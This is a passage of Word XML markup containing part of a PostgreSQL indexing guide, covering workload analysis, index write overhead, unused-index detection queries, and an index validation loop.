    <w:p w14:paraId="2B042646" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D11C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Example workload analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E03B5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query 1 (80% of load): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3352357A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    SELECT * FROM orders WHERE customer_id = ? ORDER BY created_at DESC LIMIT 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA693A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Columns: customer_id (equality), created_at (order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03C318" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Index candidate: (customer_id, created_at DESC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34602E49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC73B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query 2 (15% of load):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F50F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    SELECT customer_id, SUM(amount) FROM orders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E15996" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    WHERE created_at &gt;= ? AND created_at &lt; ? GROUP BY customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536AB22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Columns: created_at (range), customer_id (group by), amount (aggregate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4FF072" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Index candidate: (created_at, customer_id) INCLUDE (amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC82EFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF7733" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query 3 (5% of load):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4CD0D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    SELECT * FROM orders WHERE status = 'pending' AND created_at &lt; NOW() - INTERVAL '1 day'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3D458" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Columns: status (equality), created_at (range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25F574" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Index candidate: (status, created_at) WHERE status = 'pending'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4659E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      or just: (created_at) WHERE status = 'pending'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3C8F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Analyze the write workload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097066BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382272C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Inserts: 50,000/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99D10D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Updates (non-indexed columns): 20,000/second — HOT-eligible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F59F43" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Updates (indexed columns — status changes): 5,000/second — requires index update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBA862" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Deletes: 1,000/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA75F50" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1F00643E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Per-index write overhead: ~5,000 + 1,000 = 6,000 writes/second for status updates/deletes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1272BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Plus inserts: 50,000/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8C327" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6BF3B12B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Each additional index: 56,000 additional index writes/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE09E27" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>At 6 indexes: 336,000 total index write operations/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A202ECA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Assessment: 6 indexes sustainable on NVMe SSD (handles 500K+ random writes/second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAFAF29" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Measure index effectiveness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF7F13" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561AEB2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Check index usage statistics (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCC6B5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FF1C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    indexrelname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8B724D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    idx_scan,         -- times index was used for scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACDC5A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    idx_tup_read,     -- index entries read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E1D25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    idx_tup_fetch,    -- heap rows fetched via this index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700F3F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_size_pretty(pg_relation_size(indexrelid)) as size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C87FF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_stat_user_indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A3B18" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE schemaname = 'public'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359F26C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ORDER BY idx_scan DESC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5BF86" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="53814A8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Identify unused indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215D905" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT indexrelname, idx_scan, pg_size_pretty(pg_relation_size(indexrelid))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B334778" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_stat_user_indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39499857" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE idx_scan = 0 AND schemaname = 'public';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576621F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- idx_scan = 0: index was NEVER used since last statistics reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431CAD7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- These indexes are pure overhead — consider dropping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F3FE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4 — Drop unused indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66821677" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A4C5DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Unused indexes are pure overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747D267" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wasted storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195FA3D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wasted write amplification on every INSERT/UPDATE/DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C6012" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wasted buffer pool memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E4F88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- Wasted time in query planning (planner evaluates all indexes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505DE8B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3DB50221" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Drop with CONCURRENTLY to avoid locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F836D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>DROP INDEX CONCURRENTLY unused_index_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2801EBD4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6CC0E7D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Before dropping: verify index_scan = 0 across all replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A7241" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   and across a sufficient time window (weeks, not hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4DF0F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   Indexes used for infrequent but critical queries may show idx_scan = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72222D43" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   for days but be critical for monthly reporting queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F5502" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Index Validation Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCF655" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2F518" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Baseline measurement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE167DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   EXPLAIN ANALYZE the target query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A9ACB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Record: actual time, buffer hits/reads, row estimates vs actuals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F15435" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="333855D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. Create candidate index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341D1C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   CREATE INDEX CONCURRENTLY candidate_index ON table(columns);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1898E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4DADB951" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Wait for autovacuum to ANALYZE (or run ANALYZE manually):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB4081" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Statistics must reflect the new index for planner to use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D653CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6959CF7D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>4. Re-run EXPLAIN ANALYZE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579DD88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Does the planner use the new index?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F346C32" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   If not: check why (selectivity? statistics? column order?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39278013" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B691E70" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>5. Measure real-world impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC177BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Run the query with realistic parameters, not just EXPLAIN estimates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B91AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Measure p50, p95, p99 latency before and after</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0C25C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Check buffer pool hit rate changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771D30E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="35E98334" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>6. Monitor write overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B3CC7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   After index deployment: measure INSERT/UPDATE throughput before vs after</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793784CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Confirm write overhead is acceptable relative to read benefit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE4C2A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0DECE12B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>7. Remove if net negative:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386F667" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   If index doesn't improve reads OR hurts writes unacceptably: drop it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA7A7B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="6E6B63FB">
          <v:rect id="_x0000_i5431" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D99FDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD71509" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424EF11B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Indexing = Trading Write Amplification + Storage + Consistency Complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698475CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           for Read Amplification Reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7D68C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="56DE7E9E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Fundamental Trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC515C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Without index: O(N) pages read for any non-PK lookup (full table scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA07B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  With B-Tree:   O(log N) pages read — 3-4 page reads for any table size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6FAC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  With Hash:     O(1) pages read — equality only</w:t>
